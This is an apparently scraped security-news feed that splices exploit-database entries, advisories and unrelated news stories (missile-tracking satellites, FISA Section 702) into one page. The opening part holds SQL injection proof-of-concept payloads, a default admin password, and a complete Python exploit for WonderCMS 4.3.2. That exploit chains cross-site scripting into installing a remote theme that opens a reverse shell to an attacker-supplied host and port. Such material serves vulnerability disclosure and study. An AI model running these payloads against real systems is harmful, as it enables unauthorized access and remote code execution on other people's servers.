Online Library Management System version 3 suffers from a password reset vulnerability due to a logic flaw of allowing the same email address to be set for multiple users.

    # Exploit Title: Online Library Management System v3 - Password Reset and Email Matching Vulnerability# Date: 12.09.2023# Exploit Author: SoSPiro# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/online-library-management-system/# Version: v3# Tested on: Windows 10 Pro 64 Bit  + Wampserver V3.3# CVE: N/A## Description:This report outlines a security vulnerability present in the web application called [Application Name]. This vulnerability allows users to create multiple accounts with the same email address and use that email address during the password reset process. This situation can compromise the security of user accounts.## Risk Level:This vulnerability can lead to serious security risks, including unauthorized access to user accounts and identity theft. It has the potential to have a significant impact.## Step-by-Step Description:1. User creates an account as "user1," with the email address set as "user@gmail.com."2. User creates another account as "user2" and uses the same email address, "user@gmail.com."3. User2 initiates a password reset process when forgetting the password.4. As a result of the password reset process, the password for the "user1" account is also reset and can be controlled by "user2."

Online Library Management System 3 Password Reset

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

# Exploit Title: Employee Management System - SQL Injection  
# Google Dork: N/A  
# Application: Employee Management System   
# Date: 19.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Version: N/A  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

## Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'  
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.

## Vulnerable code section:  
====================================================  
employee/Admin/login.php

<?php  
session_start();  
error_reporting(1);  
include('../connect.php');

//Get website details  
$sql_website = "select * from website_setting";   
$result_website = $conn->query($sql_website);  
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST['btnlogin'])){

//Get Date  
date_default_timezone_set('Africa/Lagos');  
$current_date = date('Y-m-d h:i:s');

$email = $_POST['txtemail'];  
$password = $_POST['txtpassword'];  
$status = 'Active';

 $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."'  and status = '".$status."'";  
  $result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {  
  // output data of each row  
 ($row = mysqli_fetch_assoc($result));  
   $_SESSION["email"] = $row['email'];  
   $_SESSION["password"] = $row['password'];  
 $_SESSION["phone"] = $row['phone'];  
    $firstname = $row['firstname'];  
     $_SESSION["firstname"] = $row['firstname'];

     $fa = $row['2FA'];

  }

Employee Management System 1.0 SQL Injection

WonderCMS version 4.3.2 remote exploit that leverages cross site scripting to achieve remote code execution.

    # Author: prodigiousMind# Exploit: Wondercms 4.3.2 XSS to RCEimport sysimport requestsimport osimport bs4if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")else:  data = '''var url = "'''+str(sys.argv[1])+'''";if (url.endsWith("/")) { url = url.slice(0, -1);}var urlWithoutLog = url.split("/").slice(0, -1).join("/");var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value;var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;var xhr3 = new XMLHttpRequest();xhr3.withCredentials = true;xhr3.open("GET", urlRev);xhr3.send();xhr3.onload = function() { if (xhr3.status == 200) {   var xhr4 = new XMLHttpRequest();   xhr4.withCredentials = true;   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");   xhr4.send();   xhr4.onload = function() {     if (xhr4.status == 200) {       var ip = "'''+str(sys.argv[2])+'''";       var port = "'''+str(sys.argv[3])+'''";       var xhr5 = new XMLHttpRequest();       xhr5.withCredentials = true;       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);       xhr5.send();            }   }; }};'''  try:    open("xss.js","w").write(data)    print("[+] xss.js is created")    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))    print("----------------------------\n")    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""    XSSlink = XSSlink.strip(" ")    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)    print("----------------------------\n")    print("\nstarting HTTP server to allow the access to xss.js")    os.system("python3 -m http.server\n")  except: print(data,"\n","//write this to a file")

WonderCMS 4.3.2 Cross Site Scripting / Remote Code Execution

User Registration and Login and User Management System version 3.1 suffers from a remote SQL injection vulnerability.

#Exploit Title: User Registration & Login and User Management System With admin panel 3.1 - SQL injection  
# Application: User Registration & Login and User Management System  
# Date: 17.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/  
# Tested on: Windows 10 64 bit Wampserver 

## Description:  
The file bwdates-report-result.php contains a potential security vulnerability related to user input validation. The script retrieves user-provided date inputs without proper validation, making it susceptible to SQL injection attacks.

## Vulnerability Details:  
- **Application Name**: User Registration & Login and User Management System  
- **Software Link**: [Download Link](https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/)  
- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)

- The vulnerability lies in the following code snippet:

<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];

?>

<?php $ret=mysqli_query($con,"select * from users where date(posting_date) between '$fdate' and '$tdate'");  
$cnt=1;  
while($row=mysqli_fetch_array($ret))  
{?>

The script directly uses the user-supplied $fdate and $tdate variables in an SQL query without validating or sanitizing the input. This creates a potential avenue for malicious users to manipulate the query and perform SQL injection attacks.

## Vulnerability Description:

An attacker can exploit this vulnerability by crafting malicious input for the fromdate and todate parameters. By injecting SQL code into these fields, an attacker could manipulate the query to perform unauthorized actions on the database, potentially exposing sensitive information or even modifying the database contents.

## Proof of Concept (PoC):  
1. Visit the application locally at http://localhost/loginsystem/admin/ and login as admin  
admin user credentials which are installed by default

Username: admin  
Password: Test@12345

2. Go to "B/w Dates Report": http://localhost/loginsystem/admin/bwdates-report-ds.php  
3. Change the "To Datev" or "From Date" values. You can use this query by manipulating proxy tools like Burp Suite payload= "' OR '1'='1'; --".

User Registration And Login And User Management System 3.1 SQL Injection

A Ukrainian national has pleaded guilty in the U.S. to his role in two different malware schemes, Zeus and IcedID, between May 2009 and February 2021.
Vyacheslav Igorevich Penchukov (aka Vyacheslav Igoravich Andreev, father, and tank), 37, was arrested by Swiss authorities in October 2022 and extradited to the U.S. last year. He was added to the FBI's most-wanted list in 2012.
The U.S.

FBI's Most-Wanted Zeus and IcedID Malware Mastermind Pleads Guilty

By Waqas
The #MonikerLink security flaw in Microsoft Outlook allows hackers to execute arbitrary code on the targeted device.
This is a post from HackRead.com Read the original post: New MonikerLink Flaw Exposes Outlook Users to Data Theft and Malware

The #MonikerLink vulnerability (CVE-2024-21413) holds a CVSS score of 9.8 out of 10, indicating critical severity and high exploitability, potentially enabling system compromise with minimal user interaction.

Check Point Research (CPR) has discovered a critical security flaw in Microsoft Outlook. Dubbed the #MonikerLink; the vulnerability allows threat actors to execute arbitrary code on their targeted device. The research, detailed in a blog post, highlights the flaw’s potential to exploit the way Outlook processes certain hyperlinks.

The exploit is tracked as CVE-2024-21413 with a CVSS score of 9.8 out of 10, which means the vulnerability has critical severity and is highly exploitable, possibly allowing an attacker to compromise the system with minimal user interaction. This could lead to complete system compromise, denial of service, and data breach. Furthermore, an attacker could execute arbitrary code, steal data, and install malware. 

The issue occurs due to the way Outlook processes the “file://” hyperlinks, leading to severe security implications. Threat actors can execute unauthorized code on the targeted device. CPR’s research reveals that the #MonikerLink vulnerability misuses the Component Object Model (COM) on Windows, allowing unauthorized code execution and leaking of local NTLM credential information. 

The vulnerability exploits a user’s NTLM credentials to enable arbitrary code execution through the COM in Windows. When a user clicks on the malicious hyperlink, it connects to a remote server controlled by the attacker, compromising authentication details and potentially leading to code execution. This allows attackers to invoke COM objects and execute code on the victim’s machine remotely, bypassing the Protected View mode in Office applications.

Researchers studied three attack vectors for MS Windows-Outlook 2021: the “obvious” Hyperlink attack vector, the “normal” attachment attack vector, and the “advanced” attack vector. The “obvious” Hyperlink attack vector involves sending emails with malicious web hyperlinks, posing security risks in browsers.

The “normal” attachment attack vector involves the attacker sending a malicious email and luring the victim to open the attachment. The Advanced attack vector, the Email Reading attack vector, triggers security problems when the victim reads an email on Outlook.

Microsoft Outlook, one of the world’s most popular Microsoft Office suite apps, has become a critical gateway for introducing cyber threats into organizations. Microsoft’s Threat Protection Intelligence team discovered a critical vulnerability (CVE-2023-23397) in Outlook in March 2023 which threat actor Forest Blizzard was exploiting to steal Net-NTLMv2 hashes and access user accounts.

According to CPR’s blog post, the company has confirmed the latest vulnerability in Microsoft 365 environments and notified the Microsoft Security Response Center. Microsoft is yet to respond to the issue. Hackread.com will update readers as soon as more details are shared with the cybersecurity community.

This vulnerability, which extends beyond Outlook, poses a significant risk to organizational security. Both users and organizations are advised to apply patches, follow security practices, and remain vigilant against suspicious emails.

****RELATED ARTICLES****

1.  **Microsoft Outlook bug expose Windows credentials to hackers**
2.  **StrelaStealer Malware Hijacking Outlook, Thunderbird Accounts**
3.   **Chinese Hackers Stole Signing Key to Breach Outlook Accounts**
4.  **New variant of MassLogger Trojan stealing Chrome, Outlook data**
5.  **Microsoft Teams External Access Abuses to by DarkGate Malware**

New MonikerLink Flaw Exposes Outlook Users to Data Theft and Malware

All versions of the package github.com/greenpau/caddy-security are vulnerable to Improper Restriction of Excessive Authentication Attempts via the two-factor authentication (2FA). Although the application blocks the user after several failed attempts to provide 2FA codes, attackers can bypass this blocking mechanism by automating the application’s full multistep 2FA process.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-21500

**Improper Restriction of Excessive Authentication Attempts in github.com/greenpau/caddy-security**

Moderate severity GitHub Reviewed Published Feb 17, 2024 to the GitHub Advisory Database • Updated Feb 20, 2024

**Package**

gomod github.com/greenpau/caddy-security (Go)

**Affected versions**

<= 1.1.23

**Description**

Published to the GitHub Advisory Database

Feb 17, 2024

Last updated

Feb 20, 2024

GHSA-vfph-hjfv-cpv2: Improper Restriction of Excessive Authentication Attempts in github.com/greenpau/caddy-security

### Impact
In Hazelcast Platform through 5.3.4, a security issue exists within the SQL mapping for the CSV File Source connector. This issue arises from inadequate permission checking, which could enable unauthorized clients to access data from files stored on a member's filesystem.

### Patches
Fix versions: 5.3.5, 5.4.0-BETA-1

### Workaround
Disabling Hazelcast Jet processing engine in Hazelcast member configuration workarounds the issue. As a result SQL and Jet jobs won't work.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-45860

**Hazelcast Platform permission checking in CSV File Source connector**

Moderate severity GitHub Reviewed Published Feb 15, 2024 in hazelcast/hazelcast • Updated Feb 16, 2024

**Package**

maven com.hazelcast:hazelcast (Maven)

**Affected versions**

\>= 5.3.0, <= 5.3.4

\>= 5.2.0, <= 5.2.4

<= 5.1.7

maven com.hazelcast:hazelcast-enterprise (Maven)

\>= 5.3.0, <= 5.3.4

\>= 5.2.0, <= 5.2.4

<= 5.1.7

**Impact**

In Hazelcast Platform through 5.3.4, a security issue exists within the SQL mapping for the CSV File Source connector. This issue arises from inadequate permission checking, which could enable unauthorized clients to access data from files stored on a member's filesystem.

**Patches**

Fix versions: 5.3.5, 5.4.0-BETA-1

**Workaround**

Disabling Hazelcast Jet processing engine in Hazelcast member configuration workarounds the issue. As a result SQL and Jet jobs won't work.

**References**

*   GHSA-8h4x-xvjp-vf99
*   https://nvd.nist.gov/vuln/detail/CVE-2023-45860
*   hazelcast/hazelcast#25348
*   hazelcast/hazelcast@98be233

Published to the GitHub Advisory Database

Feb 16, 2024

Last updated

Feb 16, 2024

GHSA-8h4x-xvjp-vf99: Hazelcast Platform permission checking in CSV File Source connector

The prototype satellites hitched a ride on a Falcon 9 rocket.

Two prototype satellites for the Missile Defense Agency and four missile-tracking satellites for the US Space Force rode a SpaceX Falcon 9 rocket into orbit Wednesday from Florida's Space Coast.

These satellites are part of a new generation of spacecraft designed to track hypersonic missiles launched by China or Russia and perhaps emerging missile threats from Iran or North Korea, which are developing their own hypersonic weapons.

Hypersonic missiles are smaller and more maneuverable than conventional ballistic missiles, which the US military's legacy missile defense satellites can detect when they launch. Infrared sensors on the military's older-generation missile tracking satellites are tuned to pick out bright thermal signatures from missile exhaust.

The New Threat Paradigm

Hypersonic missiles represent a new challenge for the Space Force and the Missile Defense Agency (MDA). For one thing, ballistic missiles follow a predictable parabolic trajectory that takes them into space. Hypersonic missiles are smaller and comparatively dim, and they spend more time flying in Earth's atmosphere. Their maneuverability makes them difficult to track.

A nearly five-year-old military organization called the Space Development Agency (SDA) has launched 27 prototype satellites over the last year to prove the Pentagon's concept for a constellation of hundreds of small, relatively low-cost spacecraft in low-Earth orbit. This new fleet of satellites, which the SDA calls the Proliferated Warfighter Space Architecture, will eventually number hundreds of spacecraft to track missiles and relay data about their flight paths down to the ground. The tracking data will provide an early warning to those targeted by hypersonic missiles and help generate a firing solution for interceptors to shoot them down.

The SDA constellation combines conventional tactical radio links, laser inter-satellite communications, and wide-view infrared sensors. The agency, now part of the Space Force, plans to launch successive generations, or tranches, of small satellites, each introducing new technology. The SDA's approach relies on commercially available spacecraft and sensor technology and will be more resilient to attack from an adversary than the military's conventional space assets. Those legacy military satellites often cost hundreds of millions or billions of dollars apiece, with architectures that rely on small numbers of large satellites that might appear like a sitting duck to an adversary determined to inflict damage.

Four of the small SDA satellites and two larger spacecraft for the Missile Defense Agency were aboard a SpaceX Falcon 9 rocket when it lifted off from Cape Canaveral Space Force Station at 5:30 pm EST (2230 UTC) Wednesday.

The rocket headed northeast from Cape Canaveral to place the six payloads into low-Earth orbit. Officials from the Space Force declared the launch a success later Wednesday evening.

The SDA's four tracking satellites, built by L3Harris, are the last spacecraft the agency will launch in its prototype constellation, called Tranche 0. Beginning later this year, the SDA plans to kick off a rapid-fire launch campaign with SpaceX and United Launch Alliance to quickly build out its operational Tranche 1 constellation, with launches set to occur at one-month intervals to deploy approximately 150 satellites. Then, there will be a Tranche 2 constellation with more advanced sensor technologies.

The primary payloads aboard Wednesday's launch were for the Missile Defense Agency. These two Hypersonic and Ballistic Tracking Space Sensor (HBTSS) satellites, one supplied by L3Harris and the other by Northrop Grumman, will demonstrate medium field-of-view sensors. Those sensors can't cover as much territory as the SDA satellites but will provide more sensitive and detailed missile tracking data.

“Our advanced satellites on orbit will bring the integrated and resilient missile warning and defense capabilities the US requires against adversaries developing more advanced maneuverable missiles,” said Christopher Kubasik, chairman and CEO of L3Harris. “L3Harris delivered this advanced missile tracking capability on behalf of MDA and SDA on orbit in just over three years after work was authorized to proceed. We are proud to be a critical part of the new space sensing architecture.”

The HBTSS satellites, valued at more than $300 million, and the SDA's tracking prototypes will participate in joint military exercises in the coming months, where the wide-view SDA satellites will provide "cueing data" to the MDA's HBTSS spacecraft. The narrower field of view of the HBTSS satellites can provide more specific, target-quality data to a ground-based interceptor, according to a report last year published by the Congressional Research Service. Future tranches, or generations, of SDA satellites will incorporate the medium field-of-view sensing capability flying on the MDA's HBTSS satellites.

With SDA taking over the responsibility for making this technology operational, that will leave the MDA, which has historically flown its own missile-tracking satellites, focused on next-generation sensor development, an MDA spokesperson told Ars.

Military officials decided only last year to place the four SDA satellites on the same launch as the MDA's HBTSS mission. With all six satellites flying in the same orbital plane, there will be opportunities to see the same targets with both types of spacecraft and sensors. These targets may include scheduled US military missile tests or foreign launches.

"The intent is to be able to work with cooperative and noncooperative targets to be able to do our demonstrations," a senior SDA official said during a background briefing.

_This story originally appeared on_ _Ars Technica._

SpaceX Launched Military Satellites Designed to Track Hypersonic Missiles

A surprise disclosure of a national security threat by the House Intelligence chair was part of an effort to block legislation that aimed to limit cops and spies from buying Americans' private data.

The latest botched effort at salvaging a controversial US surveillance program collapsed this week thanks to a sabotage campaign by the United States House Intelligence Committee (HPSCI), crushing any hope of unraveling the program’s fate before Congress pivots to prevent a government shutdown in March.

An agreement struck between rival House committees fell apart on Wednesday after one side of the dispute—represented by HPSCI—ghosted fellow colleagues at a crucial hearing while working to poison a predetermined plan to usher a “compromise bill” to the floor.

A civil war between the House Judiciary and Intelligence Committees has crippled months of efforts to reauthorize Section 702 of the Foreign Intelligence Surveillance Act (FISA), an unpopular but crucial spy power, stunning the intelligence system and forcing security hawks to publicly argue in favor of surveillance tactics that even top spies acknowledge has been prone to abuse.

Witnesses to the events this week that forced House speaker Mike Johnson to shelve the latest Section 702 bill—the third of its kind to fail in as many months—say the leaders of HPSCI abandoned a deal that had been agreed to in private after weeks of negotiation. Sources familiar with the negotiations asked not to be identified, as none of them are authorized to speak publicly.

The impetus for killing the deal, WIRED has learned, was an amendment that would end the government’s ability to pay US companies for information rather than serving them with a warrant. This includes location data collected from cell phones that are capable in many cases of tracking people’s physical whereabouts almost constantly. The data is purportedly gathered for advertising purposes but is collected by data brokers and frequently sold to US spies and police agencies instead.

Senior aides say the HPSCI chair, Mike Turner, personally exploded the deal while refusing to appear for a hearing on Wednesday in which lawmakers were meant to decide the rules surrounding the vote. A congressional website shows that HPSCI staff had not filed one of the amendments meant to be discussed before the Rules Committee, suggesting that at no point in the day did Turner plan to attend.

Two senior sources on the Hill who are working for members with direct knowledge of the events but are not affiliated with either of the relevant committees say that while lawmakers waited on Turner to appear, he was meeting privately with Johnson and threatening to kill the bill he'd already signed off on.

At the same time, Turner and other HPSCI members were engaged in a floundering but possibly effective scheme to whip votes against any potential privacy enhancements, floating vague claims about an “urgent” threat against the US. Turner’s warning was later reported to concern Russia developing the capability to deploy nuclear weapons in space.

In a letter on Friday, four advocacy organizations signed a letter calling for Turner to step down from his role as Intel chair over what they called a “near-panic” started purely for “political gain.” The letter, first reported by Politico, was signed by members of groups FreedomWorks, Due Process Institute, Demand Progress, and Restore the Fourth.

Neither Johnson nor Turner’s offices responded to a request for comment.

Internal emails obtained by WIRED show that HPSCI’s ranking Democrat, Jim Himes, was likewise a part of that effort, his signature attached to a letter urging Democrats to schedule time to review “certain intelligence” in a HPSCI-operated “SCIF”—a room designed to securely host classified information. The letter implies an “urgent” threat involving foreign military capabilities that requires wide dissemination, all but ensuring it leaked to the press.

In news reports about that intelligence the following day, anonymous officials ensured it was stressed to reporters that Section 702 was essential to identifying the threat. More recent statements made by the White House and Senate intelligence staff that relay the risks the disclosure poses to classified “sources and methods” have generated skepticism around 702’s role.

Four senior aides tell WIRED that, despite speculation in _The New York Times_ that a foreign aid package related to Ukraine had been the impetus behind the effort to center the threat, Turner and Himes were motivated to instill paranoia in members that would inevitably raise doubts as to whether popular private reforms were simply too great a risk—namely those requiring the government to obtain warrants before accessing the private calls, texts, and emails of US persons, as well as “commercially available data” that can be used to monitor their whereabouts, both historically and in real-time.

This campaign—mirrored with less success by the FBI—appeared to backfire in a matter of hours, with Senate intelligence staff refusing to support Turner’s claims and instead issuing a statement that implied his disclosure had put classified sources at risk. The White House similarly dismissed the urgency communicated by Turner, warning that information related to the “threat” might expose intelligence sources.

Some aides critical of the tactics say nevertheless that they believe it may have been effective, shaking some members’ willingness to openly support reform.

“These tricks aren’t new,” said one aide. “They’re recycled, but increasingly transparent.” (“Every spymaster in history has exploited the mixed feeling of awe, gratitude, and fear that power-holders respond to in dealing with intelligence,” civil liberties attorney Frank Donner once said. It was 1971.)

By Wednesday afternoon, Himes, whose signature appeared on the initial “dear colleague” email announcing that the classified matter “should be known by all,” appeared to be seeking distance from the controversy, issuing a statement acknowledging the intel was “not a cause for panic” and saying the protection of sources is “a legal and sacred duty.”

After Johnson reluctantly killed the plans to move forward with a vote—and with it, any hope of resolving the battle over Section 702—intelligence officials began the task of redirecting the blame. The complexities of the issue, and general lack of knowledge among the public and press, aided significantly in that goal.

A Fox News report published Thursday morning, while accurately noting that it was Turner's threat that forced Johnson to cancel the vote, goes on to cite “sources close to the Intelligence Committee” who offered analysis of the events. The sources claimed that Turner was compelled to abandon the deal because the “compromise bill” had been sneakily altered in a manner that “totally screws FISA in terms of its ability to be a national security tool.”

While redirecting blame away from Turner and his cohorts, the claim is both false and deceptive, relying on assertions that, while farcical perhaps to legal experts, would be impossible for the public at large (and most of the press) to parse alone.

The text that Fox News’ intelligence sources are referring to—which can be read on the final page of the bill online—does nothing, in reality. It does not require or prevent anyone in the government from taking any action whatsoever. It also has no impact on FISA, the statute from which Section 702 derives its power.

The controversial text states that the nation’s top intelligence official “may submit” information to Congress regarding how “law enforcement agencies and the intelligence community” purchase “commercially available data about United States persons.” Essentially, it grants the intelligence community permission to do something that it does not actually need permission to do.

The language was included not to “totally screw” FISA, but to ensure that the phrase “commercially available data” appears at least once in the text, for reasons that are as benign as they are elusive to casual followers of legislative procedures.

One of the most popular amendments suggested to the Section 702 bill, discussed openly by lawmakers for months, is one that would prevent the government from purchasing data that normally requires a warrant. To counter arguments that these purchases are unrelated (which is to say, not “germane”) to the 702 program, the language in the final section, accomplishing nothing else, was added. A placeholder, effectively.

A senior source close to the Judiciary Committee said that it would have been impossible for Turner not to know the amendment was coming, and that the surprise expressed by his staff in the Fox News piece and elsewhere appeared to those in the know as pure theater.

Four aides, recordings of several public hearings, and a slew of reporting confirm that Turner had been aware for weeks, if not months, that restrictions on commercially available data would be one of the key amendments offered up by Judiciary members. The aides added that he'd also privately agreed to allow Judiciary members to offer their amendments. Prior to the bill being pulled, Representatives Warren Davidson and Zoe Lofgren had issued a relevant joint statement publicly: “It makes little sense to rein in warrantless surveillance under one authority when the government can simply fall back on other available techniques to acquire similar information,” they said.

Only after forcing Johnson to cancel the vote did the germaneness of the measure become a justification for tanking the entire process.

“No one actually thinks the Intelligence Committee cares about this,” says an aide working for a Judiciary member. “It’s the amendment they’re freaking out about. They don’t want the intelligence community to have to ask judges before they do anything.”

“For all the downplaying the agencies have done, telling us repeatedly they aren’t purchasing our data that often, Turner just blew weeks of negotiation to defend this one thing,” says the same aide. “To me, that says something about how much the government actually cares about this.”

_Update: 2/16/24, 3:35 pm ET: Added details about a letter calling for Turner to step down as Intel chair._

Tag

#auth